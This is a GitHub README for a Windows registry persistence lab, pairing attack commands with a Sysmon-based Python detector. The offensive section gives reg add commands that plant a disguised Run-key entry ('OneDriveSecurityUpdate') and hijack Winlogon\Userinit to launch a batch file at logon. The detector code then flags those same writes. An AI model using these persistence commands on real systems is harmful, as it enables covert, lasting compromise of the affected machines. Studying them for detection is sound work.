sissco-bit/Windows-Registry-Persistence-Analysis

GitHub: sissco-bit/Windows-Registry-Persistence-Analysis

Stars: 0 | Forks: 0

# Windows Registry Persistence: Exploitation & Telemetry Engineering Lab

A hands-on engineering lab mapping offensive registry modification mechanics (`HKCU` and `HK…

## 🏗 Architectural Overview

Malicious actors look for silent ways to survive system reboots without re-triggering infect…

1. **User-Level Authority (`HKCU\...\Run`):** Executes commands whenever a targeted user aut…
2. **Machine-Level Authority (`HKLM\...\Winlogon`):** An escalated system foothold. By hijac…

## 💥 Offensive Simulation (Lab Mechanics)

### 1. User-Level Foothold Deployment

To deploy an obscure user startup entry without administrative rights:

```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "OneDriveSecurityUpdate" /t …
```

### 2. System-Level Execution Escalation

```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\System32\userinit.exe, C:\Users\Public\UpdateTask.bat" /f
```
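On the telemetry side of the lab, both writes above (a new value under a `Run` key and a modified `Winlogon\Userinit`) surface as Sysmon Event ID 13 (RegistryEvent: value set) records. The following Python analyzer is an added example, not code from this repository: it parses constructed pipe-separated `Field=value` records (the real Sysmon field names `EventType`, `Image`, `TargetObject` and `Details` are used, but the line format, the SID and the vendor paths are invented for the demo), flags any `Run`/`RunOnce` value and any `Userinit` content beyond the stock `userinit.exe`, and raises severity when the autostart target sits in a user-writable location or is a script.

```python
"""Flag registry-persistence writes in Sysmon Event ID 13 (SetValue) telemetry.

Added example for this lab, not code from the repository. The 'Field=value|...'
line format and the sample events are constructed; the field names are Sysmon's.
"""
import re
from dataclasses import dataclass

# Autostart locations covered by the lab: Run/RunOnce keys and the Winlogon Userinit value.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
USERINIT_RE = re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon\\Userinit$", re.IGNORECASE)

# Stock Userinit content on a clean install (Windows stores it with a trailing comma).
EXPECTED_USERINIT = "c:\\windows\\system32\\userinit.exe"

# Locations and extensions that are unusual for legitimate autostart entries.
SUSPICIOUS_PATH_RE = re.compile(r"\\users\\public\\|\\appdata\\|\\temp\\|\\programdata\\", re.IGNORECASE)
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")


@dataclass
class Finding:
    severity: str
    rule: str
    target: str
    details: str


def parse_event(line: str) -> dict:
    """Split one constructed 'Field=value|Field=value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def userinit_entries(value: str) -> list:
    """Normalise the comma-separated Userinit value to lower-case, non-empty paths."""
    return [p.strip().lower() for p in value.split(",") if p.strip()]


def analyze_event(event: dict):
    """Return a Finding for a persistence-relevant SetValue, otherwise None."""
    if event.get("EventType") != "SetValue":
        return None
    target = event.get("TargetObject", "")
    details = event.get("Details", "")

    # Winlogon\Userinit: anything beyond the stock userinit.exe runs at every interactive logon.
    if USERINIT_RE.search(target):
        extra = [e for e in userinit_entries(details) if e != EXPECTED_USERINIT]
        if extra:
            return Finding("high", "winlogon_userinit_tamper", target, details)
        return None

    # Run / RunOnce: every new value is recorded; odd locations or scripts raise the severity.
    if RUN_KEY_RE.search(target):
        severity = "medium"
        payload = details.lower().rstrip('"')
        if SUSPICIOUS_PATH_RE.search(details) or payload.endswith(SCRIPT_EXTENSIONS):
            severity = "high"
        return Finding(severity, "run_key_autostart", target, details)
    return None


def analyze_log(lines) -> list:
    """Run analyze_event over raw telemetry lines and keep the hits, in input order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        finding = analyze_event(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: the lab's two writes, a benign vendor Run entry,
# a clean Userinit rewrite and an unrelated registry write. SID and vendor paths are invented.
SAMPLE_TELEMETRY = [
    "EventID=13|EventType=SetValue|Image=C:\\Windows\\System32\\reg.exe"
    "|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDriveSecurityUpdate"
    "|Details=C:\\Users\\Public\\UpdateTask.bat",
    "EventID=13|EventType=SetValue|Image=C:\\Windows\\System32\\reg.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit"
    "|Details=C:\\Windows\\System32\\userinit.exe, C:\\Users\\Public\\UpdateTask.bat",
    "EventID=13|EventType=SetValue|Image=C:\\Program Files\\Vendor\\setup.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorTray"
    "|Details=\"C:\\Program Files\\Vendor\\tray.exe\" /minimized",
    "EventID=13|EventType=SetValue|Image=C:\\Windows\\System32\\msiexec.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit"
    "|Details=C:\\Windows\\system32\\userinit.exe,",
    "EventID=13|EventType=SetValue|Image=C:\\Windows\\explorer.exe"
    "|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\Local Settings\\MuiCache\\1\\Value"
    "|Details=Notepad",
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_TELEMETRY):
        print(f"[{f.severity}] {f.rule}: {f.target} -> {f.details}")
```

The Userinit check compares the normalised entry list against the single stock path rather than string-matching the whole value, so the appended `UpdateTask.bat` from the lab command is caught even though `userinit.exe` is still present; the same comparison would also fire if the stock path were replaced outright. In a real deployment the records would come from the Sysmon operational log rather than the constructed list, and the allow-list for `Run` entries would be built from a known-good image instead of the two heuristics shown here.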